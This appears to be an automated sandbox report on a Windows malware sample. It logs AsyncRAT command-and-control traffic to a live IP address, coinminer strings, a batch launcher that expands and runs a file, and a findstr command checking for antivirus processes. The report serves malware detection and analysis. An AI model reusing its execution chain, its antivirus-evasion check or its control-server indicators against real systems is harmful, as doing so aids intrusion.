Source: Process started | Author: Joe Security | Data: Command: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5876, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , ProcessId: 7832, ProcessName: findstr.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T17:49:56.573527+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49725 | 104.21.96.1 | 443 | TCP
2025-03-07T17:49:58.132706+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49726 | 104.21.96.1 | 443 | TCP
2025-03-07T17:49:59.284228+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49727 | 104.21.96.1 | 443 | TCP
2025-03-07T17:50:30.040005+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 62579 | 104.21.96.1 | 443 | TCP
2025-03-07T17:50:33.786026+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 60783 | 104.21.96.1 | 443 | TCP
2025-03-07T17:50:35.008944+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 51492 | 104.21.96.1 | 443 | TCP
2025-03-07T17:50:36.203959+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 57795 | 104.21.96.1 | 443 | TCP
2025-03-07T17:50:37.280210+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 60838 | 104.21.96.1 | 443 | TCP
2025-03-07T17:50:39.601107+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 60839 | 104.21.96.1 | 443 | TCP
2025-03-07T17:50:41.614676+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 60840 | 104.21.96.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T17:49:30.092177+0100 | 2842478 | 1 | Malware Command and Control Activity Detected | 45.95.18.173 | 4449 | 192.168.11.20 | 49722 | TCP
2025-03-07T17:49:48.821228+0100 | 2842478 | 1 | Malware Command and Control Activity Detected | 45.95.18.173 | 4449 | 192.168.11.20 | 49724 | TCP

AV Detection

Source: ADFoyxP.exe | ReversingLabs: Detection: 13%
Source: ADFoyxP.exe | Virustotal: Detection: 35%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 94.9% probability

Bitcoin Miner

Source: curcuma.exe, 00000025.00000003.1791060166.0000012CE2C9D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: jsecoin.com
Source: curcuma.exe, 00000025.00000003.1817922723.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: coinhive.com/
Source: ADFoyxP.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\scoped_dir8680_1554559384
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\chrome_BITS_8680_1352400022
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:62579 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60783 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:51492 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:57795 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60838 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60839 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60840 version: TLS 1.2
Source: ADFoyxP.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ad_prod.pdb\36C00AF489401A26639ABBA698DE76062* source: curcuma.exe, 00000025.00000003.1706127726.0000012CDEE4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: curcuma.exe, 00000025.00000003.1914137812.0000012CDEE83000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665087028.0000012CDEE65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: K\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbB source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\Local State source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local Statees source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: FC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\crobat\DCG source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000001A.00000000.1139585263.0000000000502000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: ntdll.pdbUGP source: curcuma.exe, 00000025.00000002.2067051232.0000012CE02AE000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062028723.0000012CDF0B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067503246.0000012CE04AA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070281440.0000012CE10A9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064043968.0000012CDF6BA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2063400094.0000012CDF4B9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068870239.0000012CE0AAC000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070779946.0000012CE12A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067953052.0000012CE06A4000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062689732.0000012CDF2B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071810365.0000012CE16A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069313603.0000012CE0CA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066142942.0000012CDFEA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068427148.0000012CE08AD000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2072299199.0000012CE18A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069784689.0000012CE0EA7000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065673413.0000012CDFCAF000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071296730.0000012CE14A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065176277.0000012CDFAB0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064620170.0000012CDF8B3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066598163.0000012CE00A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local StateB source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local Statev source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: a\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local StateQ source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062Z source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1706127726.0000012CDEE4F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665993469.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705642796.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1704853715.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local State source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE27000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: G\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State0F2 source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: curcuma.exe, 00000025.00000002.2067051232.0000012CE02AE000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062028723.0000012CDF0B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067503246.0000012CE04AA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070281440.0000012CE10A9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064043968.0000012CDF6BA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2063400094.0000012CDF4B9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068870239.0000012CE0AAC000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070779946.0000012CE12A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067953052.0000012CE06A4000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062689732.0000012CDF2B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071810365.0000012CE16A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069313603.0000012CE0CA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066142942.0000012CDFEA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068427148.0000012CE08AD000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2072299199.0000012CE18A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069784689.0000012CE0EA7000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065673413.0000012CDFCAF000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071296730.0000012CE14A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065176277.0000012CDFAB0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064620170.0000012CDF8B3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066598163.0000012CE00A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: x\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: curcuma.exe, 00000025.00000003.1665087028.0000012CDEE82000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbx source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\Local StateLvA source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE27000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000001A.00000000.1139585263.0000000000502000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: winload_prod.pdb@0 source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062* source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665993469.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705642796.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1704853715.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062 source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665993469.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705642796.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1704853715.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local State source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdbs source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ogFiles\0F2\en-US source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0082A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 23_2_0082A087
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0082A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 23_2_0082A1E2
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0081E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 23_2_0081E472
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0082A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 23_2_0082A570
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_007EC622 FindFirstFileExW, 23_2_007EC622
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_008266DC FindFirstFileW,FindNextFileW,FindClose, 23_2_008266DC
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_008273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 23_2_008273D4
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_00827333 FindFirstFileW,FindClose, 23_2_00827333
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0081D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 23_2_0081D921
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0081DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 23_2_0081DC54
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\353090\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\353090
Source: chrome.exe Memory has grown: Private usage: 6MB later: 93MB

Networking

Source: Network traffic Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 45.95.18.173:4449 -> 192.168.11.20:49724
Source: Network traffic Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 45.95.18.173:4449 -> 192.168.11.20:49722
Source: global traffic TCP traffic: 192.168.11.20:49722 -> 45.95.18.173:4449
Source: Joe Sandbox View IP Address: 20.125.62.241 20.125.62.241
Source: Joe Sandbox View IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View ASN Name: SHOCK-1US SHOCK-1US
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49727 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49726 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49725 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:62579 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:60783 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:51492 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:57795 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:60838 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:60839 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:60840 -> 104.21.96.1:443
Source: unknown TCP traffic detected without corresponding DNS query: 96.16.68.63
Source: unknown TCP traffic detected without corresponding DNS query: 104.90.245.116
Source: unknown TCP traffic detected without corresponding DNS query: 35.186.224.24
Source: unknown TCP traffic detected without corresponding DNS query: 96.16.68.63
Source: unknown TCP traffic detected without corresponding DNS query: 96.16.68.63
Source: unknown TCP traffic detected without corresponding DNS query: 35.186.224.24
Source: unknown TCP traffic detected without corresponding DNS query: 104.90.245.116
Source: unknown TCP traffic detected without corresponding DNS query: 40.79.197.34
Source: unknown TCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknown TCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknown TCP traffic detected without corresponding DNS query: 40.79.197.34
Source: unknown TCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknown TCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknown TCP traffic detected without corresponding DNS query: 20.59.87.225
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknown TCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknown TCP traffic detected without corresponding DNS query: 20.59.87.225
Source: unknown TCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknown TCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknown TCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 69.192.139.84
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknown TCP traffic detected without corresponding DNS query: 23.221.103.220
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0082D889 InternetReadFile,SetEvent,GetLastError,SetEvent, 23_2_0082D889
